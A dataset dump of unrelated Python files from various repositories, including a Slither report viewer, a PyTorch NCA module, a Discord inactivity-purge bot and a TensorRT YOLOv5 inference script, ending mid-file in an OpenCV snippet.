self.findings_by_impact.keys():\n print(\"Please provide a valid impact level.\")\n return\n self.summarize_findings_by_check(impact, self.findings_by_impact)\n print()\n\n def summarize_findings_by_check(self, impact, findings_by_impact):\n # print(f\"Summary of Findings for Impact Level: {impact}\")\n summary = defaultdict(int)\n for finding in findings_by_impact[impact]:\n summary[finding[\"check\"]] += 1\n\n for check, count in summary.items():\n print(f\"{check:<25} {count}\")\n\n\ndef parse_report(filename, impact_filter=None):\n with open(filename, \"r\") as file:\n json_data = file.read()\n\n data = json.loads(json_data)\n\n # sort findings by impact\n findings = defaultdict(list)\n for detector in data[\"results\"][\"detectors\"]:\n if impact_filter:\n if detector[\"impact\"].lower() not in impact_filter.lower().split(\",\"):\n continue\n findings[detector[\"impact\"].lower()].append(detector)\n\n return findings\n\n\ndef display_finding(finding):\n print(f\"Finding ID: {finding['id']}\")\n print(f\"Finding Impact: {finding['impact']}\")\n print(f\"Finding Confidence: {finding['confidence']}\")\n print(f\"Finding Description: {finding['description']}\")\n print(f\"Finding Check: {finding['check']}\")\n print(f\"Finding Markdown: {finding['markdown']}\")\n print(f\"Finding First Markdown Element: {finding['first_markdown_element']}\")\n print(f\"Finding Elements: {finding['elements']}\")\n\n\ndef print_instructions(args):\n print(\n \"\"\" _______ _ __________________ _______ _______\n( ____ \\\\( \\\\ \\\\__ __/\\\\__ __/|\\\\ /|( ____ \\\\( ____ )\n| ( \\\\/| ( ) ( ) ( | ) ( || ( \\\\/| ( )|\n| | | | | | | | | (___) || (__ | (____)|\n| | | | | | | | | ___ || __) | __)\n| | | | | | | | | ( ) || ( | (\\\\ (\n| (____/\\\\| (____/\\\\___) (___ | | | ) ( || (____/\\\\| ) \\\\ \\\\__\n(_______/(_______/\\\\_______/ )_( |/ \\\\|(_______/|/ \\\\__/\n \"\"\"\n )\n print(f\"Loaded Slither Output: {args.filename}\\n\")\n print(\"Available Commands:\")\n print(f\" - {'count':<25} list finding summary\")\n print(f\" - {'sum [impact]':<25} summarize findings by detector\")\n print(\n f\" - {'list [impact]':<25} list findings by impact [high|medium|low|informational|optimization]\"\n )\n print(f\" - {'detail [impact] [number]':<25} display full findings details\")\n print(\n \"\\nVulnerability / Remediation Info: https://github.com/crytic/slither/wiki/Detector-Documentation\"\n )\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"filename\", help=\"JSON filename\")\n parser.add_argument(\"-i\", \"--impact\", help=\"impact level filter (comma-separated)\")\n args = parser.parse_args()\n\n findings_by_impact = parse_report(args.filename, args.impact)\n\n # Run the CLI\n print_instructions(args)\n FindingsCLI(findings_by_impact).cmdloop()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ARPA-Network/BLS-TSS-Network","sub_path":"contracts/slither/clither.py","file_name":"clither.py","file_ext":"py","file_size_in_byte":6180,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"16"} +{"seq_id":"15387249425","text":"# Enter your code here. Read input from STDIN. Print output to STDOUT\nblocks = int(input())\nvalues = []\nfor i in range(blocks):\n length = int(input())\n value = list(map(int, input().split()))\n values.append((length, value))\n\nfor length, value in values:\n left, right = 0, length - 1\n valid = \"Yes\"\n prev = float('inf')\n while left < right:\n if value[left] >= value[right] and value[left] <= prev:\n prev = value[left]\n left += 1\n elif value[right] >= value[left] and value[right] <= prev:\n prev = value[right]\n right -= 1\n else:\n valid = \"No\"\n break\n print(valid)\n \n","repo_name":"birehan/Competitive-Programming","sub_path":"Piling Up!/Piling Up!.py","file_name":"Piling Up!.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"36262980782","text":"\nfrom db_service import get_item\nfrom request_response_utils import return_error_response, return_status_ok\n\nENV_TABLE_NAME = \"dermoapp-patient-cases\"\n\n\ndef handler(event, context):\n try:\n print(\"lambda execution with contexts {0}\".format(str(context)))\n response = get_item()\n return return_status_ok(response)\n except Exception as err:\n return return_error_response(\"cannot proceed with the request error: \" + str(err), 500)\n","repo_name":"Miso-grupo10-dermoapp/miso-grupo10-doctor-cases-query","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"520063086","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nfrom sklearn.neighbors import NeighborhoodComponentsAnalysis\nimport lib.lossfunction.metric as metric\n\n\nclass NCA(nn.Module):\n\n def __init__(self, input_dim, output_dim=2, init_method=\"random\", max_batch_size=128, scale=1, device=\"cpu\", distance_method=\"euclidean\"):\n super(NCA, self).__init__()\n self.init_method = init_method\n self.scale = float(scale)\n\n self.input_dim = input_dim\n self.output_dim = output_dim\n self.device = torch.device(device)\n self.distance_method = distance_method\n\n if distance_method not in (\"euclidean\", ):\n raise NotImplementedError\n\n self._init_transformation()\n self._init_indices(max_batch_size=max_batch_size)\n\n def _init_indices(self, max_batch_size):\n self.batch_sample_index = []\n# max_batch_size = max_batch_size * 2\n for b_id in range(max_batch_size):\n sample_index = torch.arange(max_batch_size, device=self.device)\n sample_index = torch.cat(\n (sample_index[:b_id], sample_index[b_id+1:]))\n self.batch_sample_index.append(sample_index)\n self.batch_sample_index = torch.stack(self.batch_sample_index)\n\n def _init_transformation(self):\n \"\"\"Initialize the linear transformation A.\n \"\"\"\n if self.input_dim is None:\n self.input_dim = self.output_dim\n if self.init_method == \"random\":\n # print('using random init')\n a = torch.randn(self.input_dim, self.output_dim,\n device=self.device) / np.sqrt(self.input_dim)\n self.A = torch.nn.Parameter(a)\n elif self.init_method == \"identity\":\n a = torch.eye(self.input_dim, self.output_dim, device=self.device)\n self.A = torch.nn.Parameter(a)\n\n elif self.init_method == \"pca\":\n self.A = None\n\n else:\n raise ValueError(\n \"[!] {} initialization is not supported.\".format(self.init))\n\n def _pca(self, x):\n torch.svd(x)\n\n def forward(self, x, y, check=False):\n this_batch_size = x.shape[0]\n\n if self.A is None and self.init_method == \"pca\":\n self._pca()\n\n transformed_x = torch.mm(x, self.A)\n# print(transformed_x)\n\n if self.distance_method == \"euclidean\":\n logits_mat = metric.calc_l2_dist_torch(\n feature1=transformed_x,\n feature2=transformed_x,\n dim=1,\n is_sqrt=False,\n is_neg=True\n )\n\n else:\n raise NotImplementedError\n\n sample_indices = self.batch_sample_index[:\n this_batch_size][:, :this_batch_size-1]\n\n # print(logits_mat.shape, transformed_x.shape)\n # print(sample_indices)\n logits_mat = torch.gather(\n logits_mat, dim=1, index=sample_indices) * self.scale\n # print(logits_mat.shape)\n\n\n# logits_mat_exp = logits_mat.exp()\n# prob = logits_mat_exp / torch.sum(logits_mat_exp, dim=1, keepdim=True)\n\n# print(prob)\n logits_mat_stable = logits_mat - \\\n torch.max(logits_mat, dim=1, keepdim=True)[0]\n logits_mat_exp = logits_mat_stable.exp()\n p_ij = logits_mat_exp / torch.sum(logits_mat_exp, dim=1, keepdim=True)\n\n y_mask = y[:, None] == y[None, :]\n y_mask = torch.gather(\n y_mask,\n dim=1,\n index=sample_indices\n )\n# print(y_mask)\n# print(p_ij)\n p_ij_mask = p_ij * y_mask.float()\n p_i = p_ij_mask.sum(dim=1)\n\n# print(p_i)\n p_i = p_i.clamp(min=1e-5, max=1-1e-5)\n classification_loss = - torch.log(p_i).mean()\n\n return classification_loss, transformed_x\n\n def transform(self, x):\n return torch.mm(x, self.A)\n\n\nclass NCATrainer:\n\n def __init__(self, input_dim, output_dim=2, is_instanciate_each_iter=True, init_method=\"random\", max_batch_size=128, scale=1., device=\"cpu\", distance_method=\"euclidean\"):\n self.input_dim = input_dim\n self.output_dim = output_dim\n self.is_instanciate_each_iter = is_instanciate_each_iter\n\n if not is_instanciate_each_iter:\n self.nca = NCA(\n input_dim=input_dim,\n output_dim=output_dim,\n init_method=init_method,\n max_batch_size=max_batch_size,\n scale=scale,\n device=device,\n distance_method=distance_method\n )\n\n self.base_nca_state_dict = None\n\n def register_nca_state_dict(self, base_nca_state_dict):\n self.base_nca_state_dict = base_nca_state_dict\n\n def __call__(self, support_vector, query_vector, query_label, init_method=\"random\", max_batch_size=128, distance_method=\"euclidean\", lr=0.01, max_iter=50, stop_diff=1e-4, scale=1., get_feats=False, stop_criteria=\"l1norm\"):\n \"\"\"\n support_vectors: torch.Tensor, (num_class, num_support, D)\n query_vectors: torch.Tensor, (num_class*num_query, D)\n \"\"\"\n\n if self.is_instanciate_each_iter:\n num_class, num_support, D = support_vector.shape\n # support_vector = support_vector.cuda()\n\n if \"cuda\" not in str(support_vector.device):\n # support_vector = support_vector.cuda()\n # query_vector = query_vector.cuda()\n\n # if query_label is not None:\n # query_label = query_label.cuda()\n\n # turn_to_cpu = True\n turn_to_cpu = False\n\n else:\n turn_to_cpu = False\n\n label_for_support = torch.arange(num_class, device=support_vector.device).reshape(-1, 1)\n label_for_support = label_for_support.repeat(\n 1, num_support).reshape(-1)\n\n support_vector = support_vector.reshape(-1, D)\n # print(support_vector.device)\n\n nca = NCA(\n input_dim=self.input_dim,\n output_dim=self.output_dim,\n init_method=init_method,\n max_batch_size=max_batch_size,\n scale=scale,\n device=support_vector.device,\n distance_method=distance_method\n )\n\n if self.base_nca_state_dict is not None:\n nca.load_state_dict(self.base_nca_state_dict)\n\n first_data = nca.A.data\n for i in range(max_iter):\n loss, _ = nca(support_vector, label_for_support, check=True)\n gradients = torch.autograd.grad(\n loss, nca.A, create_graph=True)[0]\n\n prev_nca_A = nca.A.data\n\n nca.A.data = nca.A - gradients * lr\n diff = torch.abs(prev_nca_A - nca.A.data)\n \n if stop_criteria == \"l1norm\":\n diff = diff.sum()\n elif stop_criteria == \"l2norm\":\n diff = (diff * diff).sum().sqrt()\n else:\n raise NotImplementedError(stop_criteria)\n # print(\"{} th iter diff: {}, loss={}\".format(i, diff, loss))\n\n if diff <= stop_diff:\n break\n # final_diff = torch.abs(nca.A.data - first_data)\n # final_diff = (final_diff * final_diff).sum().sqrt()\n # print(\"final diff:\", final_diff, \"max iter={}\".format(max_iter))\n\n # with torch.no_grad():\n num_query = query_vector.shape[0]\n concated_vector = torch.cat((support_vector, query_vector), axis=0)\n transformed_logit = nca.transform(\n x=concated_vector\n )\n transformed_support = transformed_logit[:-num_query]\n transformed_query = transformed_logit[-num_query:]\n NB, D2 = transformed_query.shape\n\n transformed_support = transformed_support.reshape(num_class, num_support, D2)\n transformed_support_mean_feats = transformed_support.mean(dim=1)\n\n # print(transformed_query.shape)\n # print(transformed_support_mean_feats.shape)\n\n if distance_method == \"euclidean\":\n transformed_logit = metric.calc_l2_dist_torch(\n transformed_query, transformed_support_mean_feats, dim=1\n )\n else:\n raise NotImplementedError\n\n if turn_to_cpu:\n transformed_logit = transformed_logit.cpu()\n transformed_query = transformed_query.cpu()\n transformed_support = transformed_support.cpu()\n # transformed_logit = torch.mm(transformed_query, transformed_support_mean_feats.permute(1, 0))\n\n else:\n if get_feats:\n loss = 0\n num_class, num_support, D = support_vector.shape\n support_vector = support_vector.reshape(-1, D)\n\n num_query = query_vector.shape[0]\n concated_vector = torch.cat((support_vector, query_vector), axis=0)\n transformed_logit = self.nca.transform(\n x=concated_vector\n )\n transformed_support = transformed_logit[:-num_query]\n transformed_query = transformed_logit[-num_query:]\n NB, D2 = transformed_query.shape\n\n transformed_support = transformed_support.reshape(num_class, num_support, D2)\n transformed_support_mean_feats = transformed_support.mean(dim=1)\n\n # print(transformed_query.shape)\n # print(transformed_support_mean_feats.shape)\n\n if distance_method == \"euclidean\":\n transformed_logit = metric.calc_l2_dist_torch(\n transformed_query, transformed_support_mean_feats, dim=1\n )\n else:\n raise NotImplementedError\n\n else:\n assert len(query_vector.shape) == 2, query_vector.shape\n assert len(query_label.shape) == 1, query_label.shape\n loss, transformed_logit = self.nca(\n query_vector, query_label, check=True)\n\n if get_feats:\n return loss, transformed_logit, transformed_support, transformed_query\n\n else:\n return loss, transformed_logit\n\n\ndef fit_nca_with_sklearn(features, labels, args):\n nca = NeighborhoodComponentsAnalysis(\n max_iter=args.MODEL.nca_max_iter, \n tol=args.MODEL.nca_stop_diff, \n n_components=args.MODEL.embedding_n_components,\n init=\"pca\",\n verbose=1\n )\n\n nca.fit(\n X=features,\n y=labels\n )\n\n device = args.MODEL.trn_embedder.nca.A.device\n dtype = args.MODEL.trn_embedder.nca.A.dtype\n\n components = nca.components_.T\n components = torch.from_numpy(components.astype(np.float32)).type(dtype).to(device)\n\n args.MODEL.trn_embedder.nca.A.data = components\n args.MODEL.val_embedder.nca.A.data = components\n","repo_name":"min9813/self_supervise","sub_path":"src/lib/embeddings/nca.py","file_name":"nca.py","file_ext":"py","file_size_in_byte":11105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42429461651","text":"\"\"\"medications table\n\nRevision ID: 3d6bdf850d10\nRevises: 7b7fc337ef13\nCreate Date: 2023-04-02 02:06:29.945399\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '3d6bdf850d10'\ndown_revision = '7b7fc337ef13'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('medications',\n sa.Column('id', sa.Text(length=36), nullable=False),\n sa.Column('name', sa.String(length=64), nullable=False),\n sa.Column('weight', sa.Integer(), nullable=False),\n sa.Column('code', sa.String(length=64), nullable=False),\n sa.Column('image', sa.String(length=256), nullable=True),\n sa.Column('created', sa.DateTime(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n with op.batch_alter_table('medications', schema=None) as batch_op:\n batch_op.create_index(batch_op.f('ix_medications_code'), ['code'], unique=True)\n batch_op.create_index(batch_op.f('ix_medications_name'), ['name'], unique=True)\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('medications', schema=None) as batch_op:\n batch_op.drop_index(batch_op.f('ix_medications_name'))\n batch_op.drop_index(batch_op.f('ix_medications_code'))\n\n op.drop_table('medications')\n # ### end Alembic commands ###\n","repo_name":"rmoscuba/drone_dispatcher","sub_path":"drones_dispatcher/migrations/versions/3d6bdf850d10_medications_table.py","file_name":"3d6bdf850d10_medications_table.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"72431334089","text":"# Placeholder for input parameters\n# Options: Apportionment, Allocation\nprob_type = 'apportionment' # NOTE: unused\n# If apportionment, this is the maximum total that can be purchased\n# If allocation, this is the total number of machines available to be allocated\n\n\ntime_delta = 0.5 # NOTE: unused - time increment in minutes\n\n\n# Defining objective\n# Current state: only 'Max', future state to include 'Quantile' and 'Average'\nObjective = 'Max' # NOTE: unused\n# Not used in MVP\n# ObjectiveQuantileValue = 0.95\n# Waiting time <= how many minutes\nmu0Value = 500 # NOTE unused\n\n# Arrival time periods\n# not currently used\n# TotalNoOfPeriods = 4\n\n\n# Only single resource has been built\nNumberOfResources = 1 # NOTE: unused\n\n\n# Create results arrays\navgResources = np.zeros(NUM_LOCATIONS) # NOTE: unused\navgWaitingTime = np.zeros(NUM_LOCATIONS) # NOTE: unused\nMaxWaitingTime = np.zeros(NUM_LOCATIONS) # NOTE: unused\nQuantWaitingTime = np.zeros(NUM_LOCATIONS) # NOTE: unused\nWaitProbabilities = np.zeros(NUM_LOCATIONS) # NOTE: unused\nMeanClosingTimes = np.zeros(NUM_LOCATIONS) # NOTE: unused\n\n\n# Iterate over locations\nloc_sol = np.zeros(NUM_LOCATIONS) # NOTE: unused - number machines\nloc_waits = np.zeros(NUM_LOCATIONS) # NOTE: unused - voter wait times\nloc_ct = np.zeros(NUM_LOCATIONS) # NOTE: unused\n\n\nEARLY_START = 5.5 # NOTE: effectively unused\nPoll_Hours = (POLL_END - POLL_START) * 24 # NOTE: unused\nEarlyVoterHours = POLL_START - EARLY_START # NOTE: unused\n","repo_name":"AmjadRammahi/cse5911","sub_path":"code_saves/unused_globals.py","file_name":"unused_globals.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"13767433642","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[11]:\n\n\nimport numpy as np\nimport pandas as pd\nimport math\n\n#np.set_printoptions(threshold=np.inf)\n\nda = pd.read_csv('databaseAoMaAS.csv')\nta = pd.read_csv('data.tsv.csv')\nro = pd.read_csv('roles.csv', encoding = \"ISO-8859-1\")\nle = pd.read_csv('name.csv')\n\nda = da.dropna()\nta = ta.dropna()\nro = ro.dropna()\nle = le.dropna()\nda = da.groupby(['Name']).sum()\n\nro['Role No.'] = 1\nro = ro.groupby(['nconst']).sum()\nrole = pd.merge(ro,le,how='outer', on = \"nconst\")\nrole = role.drop(['nconst'], axis=1)\nrole = role.rename(index=str, columns={\"primaryName\": \"Name\"})\nrole = role.dropna()\n\ndata = pd.merge(da,ta,how='outer', on = \"Name\")\nvalues = {'primaryProfession': 'actor', 'Winner': 0}\ndata = data.fillna(value=values)\ndata = data.groupby(['Name']).mean()\n\ndatarole = pd.merge(data,role,how='outer', on = \"Name\")\ndatarole = datarole.dropna()\n\ndatarole = datarole.sort_values(by=\"Winner\", ascending = False)\n\ndisplay(datarole)\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"delvecchioj/Data-Science-Project","sub_path":"Untitled.py","file_name":"Untitled.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70651866887","text":"import asyncio\nimport discord\nimport pickle\nimport os\nfrom discord.ext import commands\nfrom datetime import datetime, timedelta\nfrom random import randint\n\nfrom constantes import TOKEN #le token du bot pour se connecter à discord\n\nif os.path.exists(\"derniereActivite.p\"):\n derniereActivite = pickle.load(open(\"derniereActivite.p\", \"rb\"))\nelse:\n derniereActivite = dict()\n #dictionnaire qui à chaque membre du serveur associe sa date de dernière activité\n\ndef save():\n pickle.dump(derniereActivite, open(\"derniereActivite.p\", \"wb\"))\n\ndef ajoutActivite(idMembre, datetime, sauvegardeEnvisageable = True):\n if idMembre not in derniereActivite or datetime > derniereActivite[idMembre]:\n derniereActivite[idMembre] = datetime\n\n if sauvegardeEnvisageable and randint(0, 10) < 1: save()\n\ndef maintenant():\n return datetime.utcnow()\n\ndef main():\n bot = commands.Bot(command_prefix=\"P.\", help_command = None)\n\n @bot.event\n async def on_raw_reaction_add(payload):\n ajoutActivite(payload.user_id, maintenant())\n\n @bot.event\n async def on_message(msg):\n ajoutActivite(msg.author.id, msg.created_at)\n await bot.process_commands(msg)\n\n @bot.command(name = \"reset\")\n async def reset(ctx):\n if ctx.author.id != ctx.guild.owner_id and not ctx.author.guild_permissions.administrator: return\n await ctx.message.add_reaction(\"🕰ï¸�\")\n\n derniereActivite.clear()\n save()\n\n for salon in ctx.guild.text_channels:\n try:\n async for message in salon.history(limit = None):\n ajoutActivite(message.author.id, message.created_at, False)\n except Exception as e: #le bot n'a pas le droit de lire ce salon, on passe au suivant\n pass\n\n save()\n await ctx.message.add_reaction(\"👌\")\n\n @bot.command(name = \"moins_actifs\")\n async def moinsActifs(ctx):\n if ctx.author.id != ctx.guild.owner_id and not ctx.author.guild_permissions.administrator: return\n\n triParDateActivite = sorted(derniereActivite.items(), key=lambda x: x[1])\n laMaintenant = maintenant()\n\n txt = \"\"\n for idMembre, dateActivite in triParDateActivite:\n if laMaintenant - dateActivite < timedelta(days = 30):\n break #on a atteint 1 membre qui a été actif il y a moins de 30 jours\n #les suivants ont été actifs plus récément encore, donc on arrête\n else: #plus d'un mois depuis la dernière activité : danger\n try:\n membre = await ctx.guild.fetch_member(idMembre)\n except: #le membre n'existe pas : a quitté le serveur\n del derniereActivite[idMembre]\n save()\n else:\n txt += f\"{membre.nick or membre.name} - dernière activité : {dateActivite}\\n\"\n\n with open(\"rapportInactifs.txt\", \"w\") as f:\n f.write(txt)\n\n await ctx.channel.send(file = discord.File(\"rapportInactifs.txt\"))\n\n @bot.command(name = \"purgeKick\")\n async def purgeKick(ctx):\n if ctx.author.id != ctx.guild.owner_id: return\n laMaintenant = maintenant()\n\n for idMembre, dateActivite in derniereActivite.items():\n if laMaintenant - dateActivite > timedelta(days = 90): #dernière activité il y a plus de 3 mois, on purge !\n try:\n membre = await ctx.guild.fetch_member(idMembre)\n except: #le membre n'existe pas : a quitté le serveur\n pass\n else:\n await membre.kick(reason = \"Aucune activité sur le serveur depuis plus de 3 mois\")\n\n @bot.command(name = \"purgeRole\")\n async def purgeRetraitRole(ctx, roleARetirerPurge: discord.Role):\n if ctx.author.id != ctx.guild.owner_id: return\n laMaintenant = maintenant()\n\n for idMembre, dateActivite in derniereActivite.items():\n if laMaintenant - dateActivite > timedelta(days = 90): #dernière activité il y a plus de 3 mois, on purge !\n try:\n membre = await ctx.guild.fetch_member(idMembre)\n except: #le membre n'existe pas : a quitté le serveur\n pass\n else:\n await membre.remove_roles(roleARetirerPurge)\n\n loop = asyncio.get_event_loop()\n loop.create_task(bot.start(TOKEN))\n loop.run_forever()\n\nmain()\n","repo_name":"fabnem12/Bot-purge","sub_path":"bot_purge.py","file_name":"bot_purge.py","file_ext":"py","file_size_in_byte":4470,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"8961213243","text":"from app import db\nfrom pony.orm import Required, Set\nfrom marshmallow import Schema, fields, post_load\n\nclass Product(db.Entity):\n name = Required(str)\n farm = Set('Farm')\n\nclass ProductSchema(Schema):\n id = fields.Str(dump_only=True)\n name = fields.Str(required=True)\n farms = fields.Nested('FarmSchema', many=True, exclude=('farm', 'user',))\n\n @post_load\n def load_farms(self, data):\n data['farms'] = [Product.get(id=product_id) for product_id in data['farm_ids']]\n del data['farm_ids']\n\n return data\n","repo_name":"draganceran/SEI-project-4","sub_path":"models/Product.py","file_name":"Product.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"73409078729","text":"# -*- coding: utf-8 -*-\n# @Author : youngx\n# @Time : 15:05 2022-04-11\nimport glob\nimport imageio\nimport cv2\nimport os\nimport numpy as np\nimport torch\nimport torchvision\nfrom trtInference import TRT\n\n\ndef xywh2xyxy(x):\n \"\"\"\n Convert nx4 boxes from [x, y, w, h] to [x1, y1, x2, y2] where xy1=top-left, xy2=bottom-right\n \"\"\"\n y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x)\n y[:, 0] = x[:, 0] - x[:, 2] / 2 # top left x\n y[:, 1] = x[:, 1] - x[:, 3] / 2 # top left y\n y[:, 2] = x[:, 0] + x[:, 2] / 2 # bottom right x\n y[:, 3] = x[:, 1] + x[:, 3] / 2 # bottom right y\n return y\n\n\ndef None_Max_Suppression(data, conf_thred=0.001, iou_thres=0.6):\n data = data[-1][0]\n selcect = data[:, 4] > conf_thred\n\n data = data[selcect]\n\n box = xywh2xyxy(data[:, :4])\n\n # conf = obj_conf * cls_conf\n data[:, 5:] = data[:, 5:] * data[:, 4].reshape(-1, 1)\n\n # Detections matrix n x 6 (xyxy, conf, cls)\n if True:\n i, j = (data[:, 5:] > conf_thred).nonzero()\n x = np.concatenate((box[i], data[i, j + 5, None], j[:, None]), 1)\n else:\n # best class only\n conf, j = data[:, 5:].max(1, keepdim=True)\n x = np.concatenate((box, conf, j), 1)[conf.view(-1) > conf_thres]\n\n n = x.shape[0] # number of boxes\n\n c = x[:, 5:6] * (0 if False else 0) # classes\n boxes, scores = x[:, :4] + c, x[:, 4] # boxes (offset by class), scores\n\n boxes = torch.from_numpy(boxes).float()\n scores = torch.from_numpy(scores).float()\n i = torchvision.ops.nms(boxes, scores, iou_thres) # NMS\n return x[i]\n\n\ndef SingleThread(test_image, outShape, TRT, engine, context):\n inputs_data, inputs_mem, output_data, output_mem, stream = TRT.allocate_buffers(engine)\n\n image = imageio.imread(test_image)\n image = cv2.resize(image, (640, 640))\n data = image / 255.0\n data = np.ascontiguousarray(data.transpose(2, 0, 1))\n data = np.array(data[None, :, :, :], dtype=np.float32, order='C')\n inputs_data[0] = data\n\n # # 进行推理\n TRT.Inference(engine=context, input_data=inputs_data, input_device=inputs_mem,\n out_data=output_data, out_device=output_mem,\n stream=stream)\n\n output_data = [output_data[-1]]\n for idx, pairs in enumerate(zip(output_data, [outShape[-1]])):\n data, size_shape = pairs\n totalsize = 1\n for i in list(size_shape):\n totalsize = totalsize * i\n assert totalsize == len(data), \"shape error !!!\"\n output_data[idx] = data.reshape(size_shape)\n\n # s2 = time.time()\n result = None_Max_Suppression(output_data)\n # draw bbox on images\n result = result.reshape(-1, 6)\n if len(result) > 0:\n\n box = result[:, :4]\n conf = result[:, 4]\n cls = result[:, :5]\n\n conf_gt = conf > 0.2\n conf = conf[conf_gt]\n cls = cls[conf_gt]\n box = box[conf_gt]\n for idx, item in enumerate(box):\n cls_item = cls[idx]\n cv2.rectangle(image, (int(item[0]), int(item[1])), (int(item[2]), int(item[3])), (255, 0, 0), 2)\n\n # import matplotlib.pyplot as plt\n # plt.imshow(image)\n # plt.show()\n # print(s2 - s1)\n\n\ndef main(onxpath, engine_file_path=\"\"):\n trtModel = TRT(onxpath, engine_file_path)\n engine = trtModel.build_engin()\n context = engine.create_execution_context()\n\n outShape = [\n (1, 3, 80, 80, 85),\n (1, 3, 40, 40, 85),\n (1, 3, 20, 20, 85),\n (1, 25200, 85),\n ]\n import time\n fileNames = glob.glob(\"./images/*.jpg\")\n\n t0 = time.time()\n for test_image in fileNames:\n SingleThread(test_image, outShape, trtModel, engine, context)\n te1 = time.time()\n print(\"{0} images total use time {1}, {2} fps\".format(len(fileNames), te1 - t0, len(fileNames) / (te1 - t0)))\n # from multiprocessing import Pool\n # p = Pool(1)\n # for test_image in fileNames[ :2]:\n # p.apply_async(SingleThread, args=(test_image, outShape, engine, context,))\n # p.close()\n # p.join()\n\n\nif __name__ == '__main__':\n onnx_path = \"yolov5s.onnx\"\n # onnx_path = \"./convert_model/multi_class_classification_sim.onnx\"\n trt_path = onnx_path.replace(\".onnx\", \"33.trt\")\n main(onnx_path, trt_path)\n","repo_name":"youngx123/tensorrt","sub_path":"trt_yolov5.py","file_name":"trt_yolov5.py","file_ext":"py","file_size_in_byte":4246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"17198243413","text":"# Игра\r\n\r\n# Рисуем поле\r\n\r\npole = [[\" \"] * 3 for i in range (3)]\r\ndef pole_():\r\n print()\r\n print (\" 1 2 3 \")\r\n for i, i_ in enumerate (pole):\r\n print(\" -------------\")\r\n pole_ris = f\" {i+1} | {' | '.join (i_)} | \"\r\n print(pole_ris)\r\n print(\" -------------\")\r\n\r\n# Комбинация победителя\r\n\r\ndef pobeda_():\r\n pob_kod = (((0, 0), (0, 1), (0, 2)),\r\n ((1, 0), (1, 1), (1, 2)),\r\n ((2, 0), (2, 1), (2, 2)),\r\n ((0, 2), (1, 1), (2, 0)),\r\n ((0, 0), (1, 1), (2, 2)),\r\n ((0, 0), (1, 0), (2, 0)),\r\n ((0, 1), (1, 1), (2, 1)),\r\n ((0, 2), (1, 2), (2, 2)))\r\n for kod_ in pob_kod:\r\n znak_ = []\r\n for i in kod_:\r\n znak_.append(pole[i[0]][i[1]])\r\n if znak_ == [\"X\", \"X\", \"X\"]:\r\n print(\"--------------------------------------------------------\")\r\n print(\"В ы и г р а л и г р о к с о з н а к о м !!!\")\r\n return True\r\n\r\n if znak_ == [\"O\", \"O\", \"O\"]:\r\n print(\"--------------------------------------------------------\")\r\n print(\"В ы и г р а л и г р о к с о з н а к о м !!!\")\r\n return True\r\n return False\r\npobeda_()\r\n\r\n# ВВод игроком\r\n\r\ndef vvod_():\r\n while True:\r\n vopros = \" Неверно, координаты цифрами c 1 до 3 \"\r\n koordinat_ = input(\" координаты: \").split()\r\n\r\n pobeda_()\r\n if len(koordinat_) != 2:\r\n print(vopros)\r\n continue\r\n x, y = koordinat_\r\n\r\n if not (x.isdigit()) or not (y.isdigit()):\r\n print(vopros)\r\n continue\r\n\r\n if 1 > int (x) or int (x) > 3 or int (y) < 1 or int (y) > 3:\r\n print(vopros)\r\n continue\r\n\r\n if pole[int(x)-1][int(y)-1] != \" \":\r\n print(\" данная клетка занята\")\r\n continue\r\n\r\n return x, y\r\n\r\n# Очередность хода, ничья\r\n\r\nnumber_ = 0\r\nwhile True:\r\n number_ += 1\r\n pole_()\r\n\r\n if number_ % 2 == 1:\r\n print()\r\n print(\" Очередь хода игрока со знаком X,введите\")\r\n else:\r\n print ()\r\n print (\" Очередь хода игрока со знаком O,введите\")\r\n\r\n x, y = vvod_()\r\n\r\n\r\n if number_ % 2 == 1:\r\n pole[int(x)-1][int(y)-1] = \"X\"\r\n else:\r\n pole[int(x)-1][int(y)-1] = \"O\"\r\n\r\n if pobeda_():\r\n pole_()\r\n break\r\n if number_ == 9:\r\n print (\" В этой партии победитель не выявлен.\")\r\n break\r\n\r\n\r\n\r\n","repo_name":"AlexeiValentinovich/Hello-earth-students","sub_path":"proekt.py","file_name":"proekt.py","file_ext":"py","file_size_in_byte":2826,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37670017753","text":"import cv2 as c\nimport numpy as np\nwidth=480\nheight=690\nvideo=c.VideoCapture(1)\n# (1088, 608)\nvideo.set(3, width)\nvideo.set(4,height)\n# 